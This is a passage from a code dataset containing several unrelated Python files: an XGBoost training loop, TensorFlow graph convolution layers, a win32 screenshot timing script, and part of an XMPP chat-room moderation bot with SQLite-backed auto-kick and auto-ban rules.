np.array(dtrain.get_label())\n num_pos = np_label.sum()\n np_pred_right = ((np.array(preds) >= 0.5) == np_label)\n accuracy_0 = (np_pred_right * (1-np_label)).sum() / (np_label.size - num_pos)\n accuracy_1 = (np_pred_right * np_label).sum() / num_pos\n accuracy_avg = 50 * (accuracy_0 + accuracy_1)\n return 'mAcc', round(accuracy_avg, 3)\ndef acc_neg(preds, dtrain):\n np_label = np.array(dtrain.get_label())\n num_pos = np_label.sum()\n np_pred_right = ((np.array(preds) >= 0.5) == np_label)\n accuracy_1 = 100. * (np_pred_right * np_label).sum() / num_pos\n return 'Acc+', accuracy_1\n\n# 计算全部、正、负样本中的准确率\ndef calc_accuracy(labels, preds, if_print=False):\n total = len(labels)\n assert len(preds) == total\n np_label = np.array(labels)\n num_pos = np_label.sum()\n np_pred_right = ((np.array(preds) >= 0.5) == np_label)\n\n accuracy_all = 100. * np_pred_right.sum() / total\n accuracy_1 = 100. * (np_pred_right * np_label).sum() / num_pos\n accuracy_0 = 100. * (np_pred_right * (1-np_label)).sum() / (total - num_pos)\n return accuracy_all, accuracy_1, accuracy_0\n\ndef load_DMatrix(file_name, col_names, s_name):\n log(\"load %s ...\" % file_name)\n dmatrix = xgb.DMatrix(file_name + \"?format=csv&label_column=0\", feature_names = col_names)\n num_1 = sum(dmatrix.get_label())\n num_0 = len(dmatrix.get_label()) - num_1\n log(\"# %s set: %s\" % (s_name, dmatrix.num_row()))\n log(\"# %s +: (%5.2f%%) %d\" % (s_name, 100. * num_1/dmatrix.num_row(), num_1))\n log(\"# %s -: (%5.2f%%) %d\" % (s_name, 100. * num_0/dmatrix.num_row(), num_0))\n log(\"# %s -/+: %.2f\" % (s_name, 1. * num_0 / num_1))\n return dmatrix\n\ndef output_predict(bst, dtrain, f_output):\n preds = bst.predict(dtrain)\n labels = dtrain.get_label()\n \"\"\"\n wf = open(f_output, 'w')\n for i in range(len(labels)):\n wf.write(\"%s\\t%s\\t%d\\n\" % (int(labels[i]), preds[i], int(preds[i]>0.5) == labels[i]))\n wf.close()\n wf = open(f_output, 'w')\n \"\"\"\n accuracy_all, accuracy_1, accuracy_0 = calc_accuracy(labels, preds)\n log(\" accuracy +: %.3f%%\" % accuracy_1)\n log(\" accuracy -: %.3f%%\" % accuracy_0)\n log(\" accuracy avg: %.3f%%\" % ((accuracy_1 + accuracy_0)/2))\n log(\" accuracy ALL: %.3f%%\" % accuracy_all)\n\ndef main():\n cols = load_col_names()\n dtrain = load_DMatrix(file_train, cols, 'train')\n dtests = load_DMatrix(file_tests, cols, 'tests')\n \n # 遍历max_depth 参数范围\n for depth in range(7, 14):\n iTrain(dtrain, dtests, depth, 50)\n\ndef iTrain(dtrain, dtests, max_depth, num_round):\n param = {'booster':'gbtree','max_depth':max_depth, 'eta':eta, 'silent':1, 'objective':'binary:logistic', 'nthread': 15}\n param['eval_metric'] = ['rmse', 'auc', 'error']\n param['scale_pos_weight'] = 2\n evallist = [(dtrain, 'N'), (dtests, 'E')]\n log(\"param:\\n\\t\" + str(param) + \"\\n\\tnum_round: \" + str(num_round))\n \n bst = xgb.train(param, dtrain, num_round, evallist, feval=acc_avg)\n loger.logu(\"train done.\")\n file_model = path_model + 'model.%s.%s' % (max_depth, num_round)\n file_fscore = file_model + \".score\"\n bst.save_model(file_model + '.dat')\n bst.dump_model(file_model + '.txt')\n \n list_score = sorted(bst.get_score(importance_type='gain').items(), key=lambda x: -x[1])\n with open(file_fscore, 'w') as wf:\n for k,v in list_score:\n wf.write(\"%12.5f\\t%s\\n\" % (v,k))\n \n log(\"predict train:\")\n output_predict(bst, dtrain, path_data + '/pred.train.txt.%s.%s' % (max_depth, num_round))\n log(\"predict test:\")\n output_predict(bst, dtests, path_data + '/pred.tests.txt.%s.%s' % (max_depth, num_round))\n\n \nif __name__ == \"__main__\":\n loger0 = Loger()\n loger0.log(\"begin...\")\n\n main()\n\n loger0.logu(\"done\")\n","repo_name":"schwt/common","sub_path":"xgboost/xgboost_train.loop.py","file_name":"xgboost_train.loop.py","file_ext":"py","file_size_in_byte":4518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"25752132100","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n###\n#Created on Wed Jul 29 10:07:22 2020\n\n#@author: aurelien\n###\n\n\nfrom inits import *\nimport tensorflow as tf\n\nflags = tf.compat.v1.flags\nFLAGS = flags.FLAGS\n# Dictionnaire des id de nos layers\n_LAYER_UIDS = {}\n\n\ndef get_layer_uid(layer_name=''):\n #Cette fonction permet d'assigner un nom unique à chaque layer#\n if layer_name not in _LAYER_UIDS:\n _LAYER_UIDS[layer_name] = 1\n return 1\n else:\n _LAYER_UIDS[layer_name] += 1\n return _LAYER_UIDS[layer_name]\n\ndef sparse_dropout(x, keep_prob, noise_shape):\n #Le dropout est utilisé afin de ne pas surentrainé notre réseau, on va perturber nous même l'apprentissage en fixant un pourcentage de poids à 0#\n random_tensor = keep_prob\n random_tensor += tf.random_uniform(noise_shape)\n dropout_mask = tf.cast(tf.floor(random_tensor), dtype=tf.bool)\n pre_out = tf.sparse_retain(x, dropout_mask)\n return pre_out * (1./keep_prob)\n\ndef dot(x, y, sparse=False):\n #cette fonction permet de multiplié deux matrices en utilisant la méthode la plus approprié suivant leur forme#\n if sparse:\n res = tf.sparse_tensor_dense_matmul(x, y)\n else:\n res = tf.matmul(x, y)\n return res\n \n\nclass Layer(object):\n\n #Un layer possède un nom qui définit la porté du layer, le logging permet de passer la représentation de notre layer sous forme d'histogramme sur 0/1.#\n \n def __init__(self, **kwargs):\n allowed_kwargs = {'name', 'logging'}\n for kwarg in kwargs.keys():\n assert kwarg in allowed_kwargs, 'Invalid keyword argument: ' + kwarg\n name = kwargs.get('name')\n if not name:\n layer = self.__class__.__name__.lower()\n name = layer + '_' + str(get_layer_uid(layer))\n self.name = name\n self.vars = {}\n logging = kwargs.get('logging', False)\n self.logging = logging\n self.sparse_inputs = False\n\n #La fonction call prend les entrées du layer et retourne les sorties# \n def _call(self, inputs):\n return inputs\n \n def __call__(self, inputs):\n with tf.name_scope(self.name):\n if self.logging and not self.sparse_inputs:\n tf.summary.histogram(self.name + '/inputs', inputs)\n outputs = self._call(inputs)\n if self.logging:\n tf.summary.histogram(self.name + '/outputs', outputs)\n return outputs \n\n def _log_vars(self):\n for var in self.vars:\n tf.summary.histogram(self.name + '/vars/' + var, self.vars[var])\n \nclass Dense(Layer):\n #Ici on déifnit un layer dense, #\n \n \n def __init__(self, input_dim, output_dim, placeholders, dropout=0., sparse_inputs=False,\n act=tf.nn.relu, bias=False, featureless=False, **kwargs):\n super(Dense, self).__init__(**kwargs)\n\n if dropout:\n self.dropout = placeholders['dropout']\n else:\n self.dropout = 0.\n\n self.act = act\n self.sparse_inputs = sparse_inputs\n self.featureless = featureless\n self.bias = bias\n\n self.num_features_nonzero = placeholders['num_features_nonzero']\n\n #on fixe les poids du layer grâce à l'initilisation de glorot et s'il y a des biais on les fixe sur zeros#\n\t\n\t\n with tf.variable_scope(self.name + '_vars'):\n self.vars['weights'] = glorot([input_dim, output_dim],\n name='weights')\n if self.bias:\n self.vars['bias'] = zeros([output_dim], name='bias')\n\t\n\t #Si l'affichage est sur on, on affiche toutes les données du layer#\n if self.logging:\n self._log_vars()\n \n\t\n def _call(self, inputs):\n \n \t#On prend x en valeur d'entrée\n x = inputs\n\n # On applique le dropout \n if self.sparse_inputs:\n x = sparse_dropout(x, 1-self.dropout, self.num_features_nonzero)\n else:\n x = tf.nn.dropout(x, 1-self.dropout)\n\n # On applique la pondération aux entrée du layer\n output = dot(x, self.vars['weights'], sparse=self.sparse_inputs)\n\n # On ajoute les biais \n if self.bias:\n output += self.vars['bias']\n\t\n\t# Enfin on retourne le tout\n return self.act(output)\n \n \nclass GraphConvolution(Layer):\n ###On définit la fonction pour créer un layer convolutionnel###\n \n def __init__(self, input_dim, output_dim, placeholders, dropout=0.,\n sparse_inputs=False, act=tf.nn.relu, bias=False,\n featureless=False, **kwargs):\n super(GraphConvolution, self).__init__(**kwargs)\n\n if dropout:\n self.dropout = placeholders['dropout']\n else:\n self.dropout = 0.\n\n self.act = act\n self.support = placeholders['support']\n self.sparse_inputs = sparse_inputs\n self.featureless = featureless\n self.bias = bias\n\n # helper variable for sparse dropout\n self.num_features_nonzero = placeholders['num_features_nonzero']\n\n with tf.variable_scope(self.name + '_vars'):\n for i in range(len(self.support)):\n self.vars['weights_' + str(i)] = glorot([input_dim, output_dim],\n name='weights_' + str(i))\n if self.bias:\n self.vars['bias'] = zeros([output_dim], name='bias')\n\n if self.logging:\n self._log_vars()\n\n def _call(self, inputs):\n \n #On prend les inputs X\n x = inputs\n\n # On applique un dropout sur X\n if self.sparse_inputs:\n x = sparse_dropout(x, 1-self.dropout, self.num_features_nonzero)\n else:\n x = tf.nn.dropout(x, 1-self.dropout)\n\n # Ici on applique une convolution \n supports = list()\n for i in range(len(self.support)):\n if not self.featureless:\n pre_sup = dot(x, self.vars['weights_' + str(i)],\n sparse=self.sparse_inputs)\n else:\n pre_sup = self.vars['weights_' + str(i)]\n support = dot(self.support[i], pre_sup, sparse=True)\n supports.append(support)\n output = tf.add_n(supports)\n\n # On ajoute les biais s'il y en a avant de retourner l'output qui passe par une fonction relu \n if self.bias:\n output += self.vars['bias']\n \n return self.act(output)\n \nif __name__=='__main__':\n pass\n\n\n","repo_name":"AurelienTTN/GCN","sub_path":"gcn/layers.py","file_name":"layers.py","file_ext":"py","file_size_in_byte":6575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34563334700","text":"import win32gui\r\nimport win32ui\r\nimport win32con\r\nfrom time import time\r\ne=[]\r\nf=time()\r\nfor i in range(35):\r\n a=time()\r\n b=win32ui.CreateDCFromHandle(win32gui.GetWindowDC(win32gui.FindWindow(None, 'example')))\r\n c=b.CreateCompatibleDC()\r\n d = win32ui.CreateBitmap()\r\n d.CreateCompatibleBitmap(b, 1920, 1080)\r\n c.SelectObject(d)\r\n c.BitBlt((0,0),(1920, 1080) , b, (0,0), win32con.SRCCOPY)\r\n d.SaveBitmapFile(c, 'file.bmp')\r\n e.append(time()-a)\r\nprint(time()-f)\r\ne.sort()\r\ninput(e)\r\n","repo_name":"frost-dream/clauth","sub_path":"New folder (2)/clauth - Copy - Copy.py","file_name":"clauth - Copy - Copy.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"37011154060","text":"import sqlite3 as db\nimport re\nimport time\n\nAKICK_COMP_EXP = {}\nAMODER_COMP_EXP = {}\nAVISITOR_COMP_EXP = {}\nABAN_COMP_EXP = {}\n\ndef querymuc(dbpath,query):\n\tcursor,connection = None, None\n\ttry:\n\t\tconnection=db.connect(dbpath)\n\t\tcursor=connection.cursor()\n\t\tcursor.execute(query)\n\t\tresult=cursor.fetchall()\n\t\tconnection.commit()\n\t\tcursor.close()\n\t\tconnection.close()\n\t\treturn result\n\texcept:\n\t\tif cursor:\n\t\t\tcursor.close()\n\t\tif connection:\n\t\t\tconnection.commit()\n\t\t\tconnection.close()\n\t\treturn ''\n\ndef compile_re_patt(gch,amuc):\n\tqli = show_amuc(gch,amuc)\n\tqli = [list(li)[0] for li in qli]\n\t\n\tif qli != '':\n\t\tamucreli = ['^'+li+'$' for li in qli]\n\t\tamuc_comp_exp = r'|'.join(amucreli)\n\t\tif amuc_comp_exp:\n\t\t\tamuc_comp_exp = re.compile(amuc_comp_exp)\n\t\treturn amuc_comp_exp\n\telse:\n\t\treturn qli\n\ndef split_reason(parameters):\n\tnijirel = parameters.split('|', 1)\n\tsplited = ['','']\t\n\t\t\n\tif len(nijirel) == 1:\n\t\tsplited[0] = nijirel[0].strip()\n\t\tsplited[1] = ''\n\telif len(nijirel) == 2:\n\t\tsplited[0] = nijirel[0].strip()\n\t\tsplited[1] = nijirel[1].strip()\n\treturn splited\n\ndef muc_set_role(func,type,source,parameters):\n\tgroupchat = source[1]\n\t\n\tsparams = split_reason(parameters)\n\tnick = sparams[0]\n\treason = sparams[1]\n\t\n\tif check_jid(nick):\n\t\tnick = get_nick(groupchat, nick)\n\t\n\tif GROUPCHATS[groupchat].has_key(nick):\n\t\tif GROUPCHATS[groupchat][nick]['ishere'] == 1:\n\t\t\tresp = func(groupchat,nick,reason)\n\t\t\n\t\t\tif func.func_name == 'kick':\n\t\t\t\tdel_banned(groupchat,nick)\n\t\t\t\tdel GROUPCHATS[groupchat][nick]\n\t\t\n\t\t\tif resp:\n\t\t\t\treply(type, source, u'Done!')\n\t\t\telse:\n\t\t\t\treply(type, source, u'Unable to perform the operation!')\n\telse:\n\t\treply(type, source, u'And then?')\n\ndef muc_set_aff(func,type,source,parameters):\n\tgroupchat = source[1]\n\t\n\tsparams = split_reason(parameters)\n\tnick_jid = sparams[0]\n\treason = sparams[1]\n\t\n\tif GROUPCHATS[groupchat].has_key(nick_jid):\n\t\tif GROUPCHATS[groupchat][nick_jid]['ishere'] == 1:\n\t\t\tif func.func_name == 'none' and reason == 'unban':\n\t\t\t\treply(type, source, u'Unable to perform the operation!')\n\t\t\t\treturn\n\t\t\t\n\t\t\tresp = func(groupchat,nick_jid,reason)\n\t\t\n\t\t\tif func.func_name == 'ban':\n\t\t\t\tdel_banned(groupchat,nick_jid)\n\t\t\t\tdel GROUPCHATS[groupchat][nick_jid]\n\t\t\n\t\t\tif resp:\n\t\t\t\treply(type, source, u'Done!')\n\t\t\telse:\n\t\t\t\treply(type, source, u'Unable to perform the operation!')\n\t\telse:\n\t\t\tif func.func_name == 'none' and reason == 'unban':\n\t\t\t\treply(type, source, u'Unable to perform the operation!')\n\t\t\t\treturn\n\t\t\t\n\t\t\tjid = GROUPCHATS[groupchat][nick_jid]['jid'].split('/')[0]\n\t\t\tresp = func(groupchat,jid,reason)\n\t\t\t\n\t\t\tif func.func_name == 'ban':\n\t\t\t\tdel_banned(groupchat,nick_jid)\n\t\t\t\tdel GROUPCHATS[groupchat][nick_jid]\n\t\t\t\n\t\t\tif resp:\n\t\t\t\treply(type, source, u'Done!')\n\t\t\telse:\n\t\t\t\treply(type, source, u'Unable to perform the operation!')\n\telif not check_jid(nick_jid):\n\t\tif func.func_name == 'none' and reason == 'unban':\n\t\t\treply(type, source, u'Unable to perform the operation!')\n\t\t\treturn\n\t\t\n\t\tjid = get_jid(groupchat, nick_jid)\n\t\t\n\t\tif jid:\n\t\t\tresp = func(groupchat,jid,reason)\n\t\t\t\n\t\t\tif func.func_name == 'ban':\n\t\t\t\tdel_banned(groupchat,nick_jid)\n\t\t\t\n\t\t\tif resp:\n\t\t\t\treply(type, source, u'Done!')\n\t\t\telse:\n\t\t\t\treply(type, source, u'Unable to perform the operation!')\n\t\telse:\n\t\t\treply(type, source, u'And, then??')\n\t\t\t\t\n\telse:\n\t\tresp = func(groupchat,nick_jid,reason)\n\t\t\t\n\t\tif resp:\n\t\t\treply(type, source, u'Done!')\n\t\telse:\n\t\t\treply(type, source, u'Unable to perform the operation!')\n\ndef del_banned(gch, nick):\n\tif not nick:\n\t\tnick = ''\n\t\n\tnick = nick.replace('\"','"')\n\tsql = 'DELETE FROM users WHERE nick=\"%s\";' % (nick)\n\tqres = querymuc('settings/'+gch+'/users.db',sql)\n\t\n\tif qres == []:\n\t\treturn True\n\ndef get_join_nick(gch, jid):\n\tnick = ''\n\t\n\tnickl = [li for li in GROUPCHATS[gch] if jid in GROUPCHATS[gch][li]['jid'] and GROUPCHATS[gch][li]['ishere'] == 1]\n\t\n\tif nickl:\n\t\tnick = nickl[-1]\n\t\t\n\treturn nick\t\t\n\t\t\ndef get_nick(gch, jid):\n\tjid = jid.replace('\"','"')\n\tsql = 'SELECT nick FROM users WHERE jid=\"%s\" ORDER BY ujoin;' % (jid)\n\tqres = querymuc('settings/'+gch+'/users.db',sql)\n\t\n\tif qres:\n\t\tnick = qres[-1][0]\n\t\treturn nick\n\ndef get_jid(gch, nick):\n\tnick = nick.replace('\"','"')\n\tsql = 'SELECT jid FROM users WHERE nick=\"%s\";' % (nick)\n\tqres = querymuc('settings/'+gch+'/users.db',sql)\n\t\n\tif qres:\n\t\tjid = qres[0][0]\n\t\treturn jid\n\ndef check_jid(jid):\n\tparse_jid = jid.split('@')\n\t\n\tif len(parse_jid) == 2:\n\t\tif parse_jid[0] and parse_jid[1]:\n\t\t\tif parse_jid[1].count('.') >= 1 and parse_jid[1].count('.') <= 3:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\t\n\t\telse:\n\t\t\treturn False\n\telse:\n\t\treturn False\n\ndef set_subject(groupchat, subject):\n\tmsg = xmpp.Message(groupchat)\n\tmsg.setType('groupchat')\n\tmsg.setTagData('subject',subject)\n\tresp = JCON.send(msg)\n\t\n\tif resp:\n\t\treturn True\n\ndef kick(groupchat, nick, reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('kick'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\tkick=query.addChild('item', {'nick':nick, 'role':'none'})\t\n\tkick.setTagData('reason', reason)\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\n\ndef ban(groupchat, nick_jid, reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('ban'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\t\n\tif check_jid(nick_jid):\n\t\tban=query.addChild('item', {'jid':nick_jid, 'affiliation':'outcast'})\t\t\n\telse:\n\t\tban=query.addChild('item', {'nick':nick_jid, 'affiliation':'outcast'})\n\t\n\tban.setTagData('reason', reason)\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\n\ndef none(groupchat, nick_jid,reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('none'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\t\n\tif check_jid(nick_jid):\n\t\tnone=query.addChild('item', {'jid':nick_jid, 'affiliation':'none'})\n\telse:\n\t\tnone=query.addChild('item', {'nick':nick_jid, 'affiliation':'none'})\n\t\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\n\ndef visitor(groupchat, nick, reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('voice'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\tvisitor=query.addChild('item', {'nick':nick, 'role':'visitor'})\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\n\ndef participant(groupchat, nick, reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('part'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\tparticipant=query.addChild('item', {'nick':nick, 'role':'participant'})\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\n\t\ndef member(groupchat, nick_jid, reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('member'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\t\n\tif check_jid(nick_jid):\n\t\tmember=query.addChild('item', {'jid':nick_jid, 'affiliation':'member'})\n\telse:\n\t\tmember=query.addChild('item', {'nick':nick_jid, 'affiliation':'member'})\n\t\n\tmember.setTagData('reason', reason)\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\t\n\t\ndef moderator(groupchat, nick, reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('moder'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\tmoderator=query.addChild('item', {'nick':nick, 'role':'moderator'})\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\t\n\ndef admin(groupchat, nick_jid, reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('admin'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\t\n\tif check_jid(nick_jid):\n\t\tadmin=query.addChild('item', {'jid':nick_jid, 'affiliation':'admin'})\n\telse:\n\t\tadmin=query.addChild('item', {'nick':nick_jid, 'affiliation':'admin'})\n\t\n\tadmin.setTagData('reason', reason)\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\t\n\t\ndef owner(groupchat, nick_jid, reason):\n\tiq = xmpp.Iq('set')\n\tiq.setTo(groupchat)\n\tiq.setID('owner'+str(random.randrange(1000, 9999)))\n\tquery = xmpp.Node('query')\n\tquery.setNamespace(xmpp.NS_MUC_ADMIN)\n\t\n\tif check_jid(nick_jid):\n\t\towner=query.addChild('item', {'jid':nick_jid, 'affiliation':'owner'})\n\telse:\n\t\towner=query.addChild('item', {'nick':nick_jid, 'affiliation':'owner'})\n\t\n\towner.setTagData('reason', reason)\n\tiq.addChild(node=query)\n\tresp = JCON.send(iq)\n\t\n\tif iq.getID() == resp:\n\t\treturn True\t\n\ndef save_amuc(gch,amuc,exp,reason=''):\n\texp = exp.replace(r'\"', r'"')\n\treason = reason.replace(r'\"', r'"')\n\t\n\tif amuc == 'akick' or amuc == 'aban':\n\t\tsql = 'INSERT INTO %s (exp,reason) VALUES (\"%s\",\"%s\");' % (amuc,exp.strip(),reason.strip())\n\telse:\n\t\tsql = 'INSERT INTO %s (exp) VALUES (\"%s\");' % (amuc,exp.strip())\n\t\n\trep = querymuc('settings/'+gch+'/amuc.db',sql)\n\treturn rep\n\t\ndef show_amuc(gch,amuc):\n\tif amuc == 'akick' or amuc == 'aban':\n\t\tsql = 'SELECT exp,reason FROM %s;' % (amuc)\n\telse:\n\t\tsql = 'SELECT exp FROM %s;' % (amuc)\n\t\n\trep = querymuc('settings/'+gch+'/amuc.db',sql)\n\treturn rep\n\ndef del_amuc(gch,amuc,amucre):\n\tsql = 'DELETE FROM %s WHERE exp=\"%s\";' % (amuc,amucre)\n\trep = querymuc('settings/'+gch+'/amuc.db',sql)\n\treturn rep\n\ndef clear_amuc(gch,amuc):\n\tsql = 'DELETE FROM '+amuc+';'\n\trep = querymuc('settings/'+gch+'/amuc.db',sql)\n\treturn rep\n\ndef set_amuc(gch,amfunc,cpatt,nick,jid):\n\tamucnifi = []\n\t\n\tif cpatt:\n\t\tamucnifi = cpatt.findall(nick)\n\t\t\n\tif amucnifi:\n\t\tif amfunc.func_name != 'moderator' and user_level(gch+'/'+nick,gch) <= 10:\n\t\t\tamfunc(gch, amucnifi[-1], '')\n\t\t\treturn\n\t\telif amfunc.func_name == 'moderator':\n\t\t\tamfunc(gch, amucnifi[-1], '')\n\t\t\treturn\n\t\t\n\tamucjifi = []\n\t\t\n\tif cpatt:\t\n\t\tamucjifi = cpatt.findall(jid)\n\t\n\tif amucjifi:\n\t\tif amfunc.func_name != 'ban': \n\t\t\tnick = get_join_nick(gch, amucjifi[-1])\n\t\t\t\n\t\t\tif nick:\n\t\t\t\tif amfunc.func_name != 'moderator' and user_level(gch+'/'+nick,gch) <= 10:\n\t\t\t\t\tamfunc(gch, nick, '')\n\t\t\t\t\treturn\n\t\t\t\telif amfunc.func_name == 'moderator':\n\t\t\t\t\tamfunc(gch, nick, '')\n\t\t\t\t\treturn\n\t\telse:\n\t\t\tif user_level(gch+'/'+nick,gch) <= 10:\n\t\t\t\tamfunc(gch, jid, '')\n\t\t\t\tdel GROUPCHATS[groupchat][nick]\n\ndef handler_amuc_join(groupchat, nick, aff, role):\n\tjid = get_true_jid(groupchat+'/'+nick)\n\t\t\n\tif AMODER_COMP_EXP[groupchat]:\n\t\tset_amuc(groupchat,moderator,AMODER_COMP_EXP[groupchat],nick,jid)\n\t\n\tif AVISITOR_COMP_EXP[groupchat] and aff == 'none':\n\t\tset_amuc(groupchat,visitor,AVISITOR_COMP_EXP[groupchat],nick,jid)\n\t\n\tif AKICK_COMP_EXP[groupchat] and aff == 'none':\n\t\tset_amuc(groupchat,kick,AKICK_COMP_EXP[groupchat],nick,jid)\n\t\n\tif ABAN_COMP_EXP[groupchat] and aff == 'none':\n\t\tset_amuc(groupchat,ban,ABAN_COMP_EXP[groupchat],nick,jid)\n\t\ndef handler_amuc_presence(prs):\n\tptype = prs.getType()\n\tgroupchat = prs.getFrom().getStripped()\n\tnick = prs.getFrom().getResource()\n\tjid=get_true_jid(groupchat+'/'+nick)\n\tscode = prs.getStatusCode()\n\n\tif scode == '303' and ptype == 'unavailable':\n\t\tnewnick = prs.getNick()\n\t\t\n\t\tif AMODER_COMP_EXP[groupchat]:\n\t\t\tset_amuc(groupchat,moderator,AMODER_COMP_EXP[groupchat],newnick,jid)\n\t\t\n\t\tif AVISITOR_COMP_EXP[groupchat]:\n\t\t\tset_amuc(groupchat,visitor,AVISITOR_COMP_EXP[groupchat],newnick,jid)\n\t\t\n\t\tif AKICK_COMP_EXP[groupchat]:\n\t\t\tset_amuc(groupchat,kick,AKICK_COMP_EXP[groupchat],newnick,jid)\n\t\t\n\t\tif ABAN_COMP_EXP[groupchat]:\n\t\t\tset_amuc(groupchat,ban,ABAN_COMP_EXP[groupchat],newnick,jid)\n\t\ndef get_amuc_state(gch):\n\tglobal AKICK_COMP_EXP\n\tglobal AMODER_COMP_EXP\n\tglobal AVISITOR_COMP_EXP\n\tglobal ABAN_COMP_EXP\n\t\n\tif not AKICK_COMP_EXP.has_key(gch):\n\t\tAKICK_COMP_EXP[gch] = ''\n\tif not AMODER_COMP_EXP.has_key(gch):\n\t\tAMODER_COMP_EXP[gch] = ''\n\tif not AVISITOR_COMP_EXP.has_key(gch):\n\t\tAVISITOR_COMP_EXP[gch] = ''\n\tif not ABAN_COMP_EXP.has_key(gch):\n\t\tABAN_COMP_EXP[gch] = ''\n\t\n\tif not os.path.exists('settings/'+gch+'/amuc.db'):\n\t\tsql = 'CREATE TABLE avisitor(id integer primary key autoincrement, exp varchar,unique (exp))'\n\t\tquerymuc('settings/'+gch+'/amuc.db',sql)\n\t\tsql = 'CREATE TABLE akick(id integer primary key autoincrement, exp varchar, reason varchar, unique (exp))'\n\t\tquerymuc('settings/'+gch+'/amuc.db',sql)\n\t\tsql = 'CREATE TABLE amoderator(id integer primary key autoincrement, exp varchar, unique (exp))'\n\t\tquerymuc('settings/'+gch+'/amuc.db',sql)\n\t\tsql = 'CREATE TABLE aban(id integer primary key autoincrement, exp varchar, reason varchar, unique (exp))'\n\t\tquerymuc('settings/'+gch+'/amuc.db',sql)\n\telse:\n\t\tAKICK_COMP_EXP[gch] = compile_re_patt(gch,'akick')\n\t\tAMODER_COMP_EXP[gch] = compile_re_patt(gch,'amoderator')\n\t\tAVISITOR_COMP_EXP[gch] = compile_re_patt(gch,'avisitor')\n\t\tABAN_COMP_EXP[gch] = compile_re_patt(gch,'aban')\n\ndef handler_akick(type, source, parameters):\n\tgroupchat = source[1]\n\t\n\tif not GROUPCHATS.has_key(groupchat):\n\t\treply(type, source, u'This command can only be used in conference!')\n\t\treturn\n\t\n\tglobal AKICK_COMP_EXP\n\t\n\tspltd = split_reason(parameters)\n\texp = spltd[0]\n\treason = spltd[1]\n\t\n\tif parameters and not parameters[1:].isdigit() and len(parameters) != 1:\n\t\tres = save_amuc(groupchat,'akick',exp,reason)\n\t\t\n\t\tif res != '':\n\t\t\treply(type,source,u'Rule added!')\n\t\t\tAKICK_COMP_EXP[groupchat] = compile_re_patt(groupchat,'akick')\n\t\t\t\n\t\t\tnicks = [li for li in GROUPCHATS[groupchat] if GROUPCHATS[groupchat][li]['ishere'] == 1]\n\t\t\tjids = [GROUPCHATS[groupchat][li]['jid'].split('/')[0] for li in GROUPCHATS[groupchat] if GROUPCHATS[groupchat][li]['ishere'] == 1]\n\t\t\t\t\t\t\n\t\t\tI = 0\t\t\t\n\t\t\t\t\t\t\n\t\t\twhile I != len(nicks):\n\t\t\t\tset_amuc(groupchat,kick,AKICK_COMP_EXP[groupchat],nicks[I],jids[I])\n\t\t\t\tI += 1\n\t\telse:\n\t\t\treply(type,source,u'Error adding rule!')\n\telif parameters and parameters[1:].isdigit() and parameters[0] == '-':\n\t\tparameters = parameters[1:]\n\t\takreli = show_amuc(groupchat,'akick')\n\t\trenum = int(parameters)\n\t\t\n\t\tif renum > len(akreli) or renum <= 0:\n\t\t\treply(type,source,u' Wrong number of rules!')\n\t\t\treturn\n\t\t\n\t\tamucre = akreli[renum-1][0]\n\t\tdres = del_amuc(groupchat,'akick',amucre)\n\t\t\n\t\tif dres != '':\n\t\t\treply(type,source,u'The rule is removed from the list!')\n\t\t\tAKICK_COMP_EXP[groupchat] = compile_re_patt(groupchat,'akick')\n\t\telse:\n\t\t\treply(type,source,u'Deleted!')\n\telif parameters and '-' in parameters and len(parameters) == 1:\n\t\tqres = clear_amuc(groupchat,'akick')\n\t\t\n\t\tif qres != '':\n\t\t\trep = u'List of 